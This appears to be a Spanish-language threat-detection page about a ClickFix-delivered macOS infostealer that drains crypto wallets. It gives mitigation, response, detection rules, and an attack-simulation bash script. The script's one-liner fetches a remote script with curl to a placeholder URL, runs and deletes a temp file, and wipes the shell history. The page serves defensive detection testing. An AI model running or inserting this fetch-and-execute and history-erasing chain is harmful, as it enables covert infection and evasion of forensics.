macOS Infostealer apunta a carteras de criptomonedas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un ladrón basado en Go para macOS está apuntando a usuarios de criptomonedas a través de una campaña de ingeniería social ClickFix. El malware roba credenciales sensibles del Apple Keychain y de las tiendas del navegador, además de tener la capacidad de agotar gradualmente los saldos de criptomonedas de las carteras de las víctimas. La cadena de infección comienza con un perfilador de scripts de shell que entrega cargas útiles Mach-O específicas de la arquitectura.
Investigación
Los analistas de Huntress descubrieron la amenaza durante una búsqueda retrospectiva e identificaron componentes de un ladrón específico para macOS que había permanecido activo durante aproximadamente tres meses. La investigación vinculó la infraestructura de soporte al Grupo Aeza, un proveedor ruso de hosting a prueba de balas sancionado. Los investigadores reconstruyeron la cadena de ataque desde el aviso inicial de ingeniería social ClickFix hasta la ejecución final de la carga útil y la comunicación C2.
Mitigación
Los usuarios deben evitar interactuar con avisos de CAPTCHA sospechosos o seguir instrucciones inusuales que requieran comandos a ser ingresados en Terminal. Las extensiones de navegador diseñadas para restringir scripts maliciosos, como NoScript, y herramientas de bloqueo basadas en DNS como Pi-hole pueden ayudar a reducir la exposición. Un entrenamiento integral de concienciación para usuarios enfocado en la ingeniería social ClickFix sigue siendo una de las defensas más efectivas.
Respuesta
Si se detecta una infección, el sistema macOS afectado debe ser aislado inmediatamente para detener la exfiltración de datos adicional o el agotamiento de la billetera de criptomonedas. Los administradores deben localizar y eliminar todos los binarios maliciosos Mach-O y los mecanismos de persistencia asociados. Dado que el malware apunta a credenciales, se deben restablecer las contraseñas para todas las cuentas accedidas desde el dispositivo comprometido.
Flujo de Ataque
Detecciones
Lanzamiento Bootstrap desde Ruta No Estándar (vía creación_de_proceso)
Proof of Value
Intento Posible de Enumeración System_profiler (vía creación_de_proceso)
Proof of Value
Intento Sospechoso de Ejecución de Curl [MacOS] (vía línea_de_comando)
Proof of Value
IOCs (HashSha256) para detectar: malware macOS que agota la billetera quiere tu cripto
Proof of Value
IOCs (SourceIP) para detectar: malware macOS que agota la billetera quiere tu cripto
Proof of Value
IOCs (DestinationIP) para detectar: malware macOS que agota la billetera quiere tu cripto
Proof of Value
Detección de Técnicas de Persistencia y Ejecución de Malware en macOS [Evento de Archivo de Linux]
Proof of Value
Ataque de Malware macOS que Agota la Billetera [Creación de Proceso de Linux]
Proof of Value
Ejecución de Simulación
Prerrequisito: El Verificación de Pre-vuelo de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos: El adversario inicia una estafa ClickFix. La víctima es engañada para ejecutar un comando en su terminal. El comando usa
curl -kFsSLpara descargar un script malicioso de forma silenciosa. Para evitar dejar huellas, el script se ejecuta a través de un one-liner de bash que elimina inmediatamente su propio archivo temporal (.UlaccK). Finalmente, el atacante ejecuta un comando complejohistorypara eliminar quirúrgicamente el comando del historial de shell del usuario, haciendo que el ataque sea invisible a una inspección forense casual. -
Script de Prueba de Regresión:
#!/bin/bash # Simulación del Ataque de Malware ClickFix en macOS # Este script imita los patrones exactos de cadena requeridos por la regla de detección. echo "[+] Iniciando Simulación..." # 1. Simular la descarga de curl (Selección 3) # 2. Simular la ejecución de bash y la eliminación inmediata (Selección 1) # 3. Simular la manipulación del historial (Selección 2) # Combinamos estos en una sola línea para imitar el patrón de comportamiento # Nota: Usamos una URL ficticia para evitar la ejecución real de malware curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}') echo "[+] Comando de Simulación Ejecutado." echo "[!] Verifique su SIEM para la alerta 'Ataque de Malware que Agota la Billetera en macOS'." -
Comandos de Limpieza:
# Eliminar cualquier artefacto dejado por la simulación rm -f .UlaccK # Nota: La manipulación del historial en el script tiene la intención de simular evasión; # puede ser necesario restaurar el historial manualmente para el usuario de prueba.